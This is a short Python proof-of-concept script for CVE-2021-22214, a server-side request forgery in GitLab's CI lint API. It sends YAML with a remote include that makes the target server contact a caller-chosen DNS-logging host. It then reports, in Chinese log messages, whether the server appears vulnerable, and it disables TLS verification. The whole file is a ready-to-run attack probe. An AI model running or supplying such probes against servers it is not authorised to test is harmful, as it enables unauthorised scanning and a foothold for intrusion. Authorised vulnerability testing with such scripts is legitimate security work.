CVE-2021-22214.py

import json
import requests
from loguru import logger

class CVE_2021_22214():
    @logger.catch(level='ERROR')
    def __init__(self):
        self.headers = {"Content-Type": "application/json"}
        self.api = '/api/v4/ci/lint'

    @logger.catch(level='ERROR')
    def poc(self, url: str, dnshost: str = ''):
        url = url.rstrip('/')
        data = {
            "include_merged_yaml": True,
            "content": f"include:\n  remote: http://{dnshost}/api/v1/targets?test.yml"
        }
        resp = requests.post(url=f'{url}{self.api}', data=json.dumps(data), headers=self.headers, verify=False)
        if resp.status_code == 200:
            if dnshost in resp.json()["errors"][0]:
                logger.info(f"[+] {url} 可能存在 GitLab SSRF 漏洞，请查看dnslog记录.")
                return True
        logger.info(f"[-] {url} 不存在 GitLab SSRF 漏洞！")
        return False

if __name__ == '__main__':
    target = 'http://xxx.xx'
    cve = CVE_2021_22214()
    cve.poc(target)